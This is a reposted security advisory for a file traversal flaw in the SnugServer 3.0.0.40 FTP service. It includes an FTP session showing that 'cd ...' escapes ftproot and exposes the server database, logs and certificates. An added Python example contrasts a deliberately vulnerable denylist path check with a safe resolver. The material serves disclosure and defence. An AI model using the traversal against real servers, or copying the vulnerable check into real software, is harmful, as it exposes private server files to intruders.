[Repost] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40

Article author: seclists.org

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks. Product
Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in the
SnugServer 3.0.0.40 FTP Service. Any authenticated FTP user who
changes directory to "..." (three dots) escapes the configured
ftproot and lands in the SnugServer installation directory,
exposing the server filesystem outside of ftproot, including the
server database (SNUG.FDB, Snug.gbk), logs, certificates and the
other application directories shown in the PoC below.

[-] PoC

root_at_Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
Welcome FTP User. SnugServer is ready.
Name (192.168.1.154:root): muts_at_default.com
331 Password required for muts_at_default.com.
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group 0 Jan 21 03:51 www
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>
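The session above shows a component that is not literally ".." escaping the FTP root. The script below is an added illustration, not SnugServer's code: it contrasts a denylist check that only rejects an exact ".." component (the pattern the PoC slips past) with a resolver that canonicalises the path with the same rules the storage backend will apply and then checks it is still under ftproot. The "three dots collapse to the parent directory" rule in backend_normalise, the root directory /srv/snug/ftp and the sample requests are assumptions constructed to model the observed behaviour; the advisory itself does not state the root cause.

```python
"""Virtual-root path resolution for an FTP service.

Added example, not SnugServer code.  The backend rule that an all-dot
component such as '...' resolves like '..' is an ASSUMPTION used to model
the behaviour seen in the PoC; it is not a documented root cause.
"""
import posixpath
from typing import Dict, Optional, Tuple

FTPROOT = "/srv/snug/ftp"                   # constructed: configured ftproot
INSTALL_DIR = posixpath.dirname(FTPROOT)    # constructed: install directory


def denylist_filter(requested: str) -> bool:
    """Vulnerable pattern: accept unless some component is exactly '..'."""
    return all(part != ".." for part in requested.split("/"))


def backend_normalise(path: str) -> str:
    """Model of a filesystem layer that treats any component made only of
    dots as '.' (single dot) or '..' (two or more dots), then normalises.
    ASSUMPTION for illustration: this is what lets '...' act as '..'."""
    parts = []
    for part in path.split("/"):
        if part and not part.rstrip("."):       # component is all dots
            part = ".." if len(part) >= 2 else "."
        parts.append(part)
    return posixpath.normpath("/".join(parts))


def vulnerable_resolve(cwd: str, requested: str) -> Optional[str]:
    """Check the raw request against a denylist, then hand the joined path
    to the backend.  The check and the backend disagree about '...'."""
    if not denylist_filter(requested):
        return None
    return backend_normalise(posixpath.join(cwd, requested))


def safe_resolve(cwd: str, requested: str) -> Optional[str]:
    """Canonicalise first, with the backend's own rules, then require the
    result to be FTPROOT itself or a path strictly below it.  Backslashes
    are treated as separators since the server runs on Windows."""
    joined = posixpath.join(cwd, requested.replace("\\", "/"))
    candidate = backend_normalise(joined)
    if candidate != FTPROOT and not candidate.startswith(FTPROOT + "/"):
        return None
    return candidate


def demo(cwd: str = FTPROOT) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Resolve a set of constructed requests both ways.  Each value is
    (vulnerable_result, safe_result); None means the request was refused."""
    requests = [
        "dir",            # ordinary subdirectory: both allow it
        "..",             # literal parent: both refuse it
        "...",            # the PoC: denylist allows, lands in INSTALL_DIR
        "dir/.../...",    # same trick two levels down
        "dir/../dir2",    # legitimate path the denylist wrongly refuses
    ]
    return {r: (vulnerable_resolve(cwd, r), safe_resolve(cwd, r)) for r in requests}


if __name__ == "__main__":
    for req, (vuln, safe) in demo().items():
        print(f"{req!r:16} vulnerable -> {vuln!s:22} safe -> {safe}")
```

The point of safe_resolve is not the extra dots rule but the ordering: the containment check runs on the path the backend will actually open, so any normalisation quirk (dots, backslashes, "../" sequences) is applied before the comparison rather than after it. The denylist version is also stricter than it needs to be, refusing "dir/../dir2", which canonicalises to a perfectly valid location inside ftproot.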

[-] Patch

The vendor has been notified, and an update is available at:

http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts